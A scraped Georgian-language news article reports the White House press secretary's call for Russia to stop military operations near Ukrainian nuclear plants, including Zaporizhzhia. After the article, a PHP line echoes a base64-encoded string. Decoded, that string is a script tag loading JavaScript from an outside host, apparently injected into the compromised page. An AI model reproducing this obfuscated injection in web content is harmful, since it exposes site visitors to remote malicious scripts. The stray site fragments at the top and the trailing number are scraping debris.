celsiusi
ავერსი საქკაბელი
აშშ მოუწოდებს რუსეთს, შეწყვიტოს სამხედრო ოპერაციები ბირთვულ ობიექტებთან უკრაინაში, – ამის შესახებ განცხადება თეთრი სახლის პრესსპიკრმა, კარინ ჟან-პიერმა გააკეთა. ინფორმაციას „ბიბისი“ ავრცელებს.
 
„ატომურ სადგურებთან საბრძოლო მოქმედებები სახიფათოა და ობიექტებზე სრული კონტროლი უნდა დაუბრუნდეს უკრაინას“, – განაცხადა ჟან-პიერმა.
 
მისივე თქმით, აშშ აგრძელებს სიტუაციის მონიტორინგს და ამ დრომდე რადიაციის დონე ზაპოროჟიეს ელექტროსადგურთან ნორმის ფარგლებშია.
 
თეთრი სახლის პრესსპიკერის განცხადებით, ვაშინგტონი ინფორმირებულია ატომური სადგურის თანამშრომლების მიმართ არასათანადო მოპყრობის შესახებ და მიესალმება, რომ უკრაინის ხელისუფლება და ატომური ელექტროსადგურის ოპერატორი იცავენ ბირთვულ უსაფრთხოებას, ასეთ რთულ პირობებშიც კი.
 
შეგახსენებთ, რომ 6 და 7 აგვისტოს ზაპოროჟიეს ატომურ ელექტროსადგურზე სარაკეტო იერიში განხორციელდა, რაშიც კიევი და მოსკოვი ერთმანეთს ადანაშაულებენ. ევროპაში ყველაზე დიდი ატომური ელექტროსადგური მარტიდან მოყოლებული რუსეთის არმიას აქვს ოკუპირებული, თუმცა სადგურზე კვლავ უკრაინელი თანამშრომლები მუშაობენ.
509
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");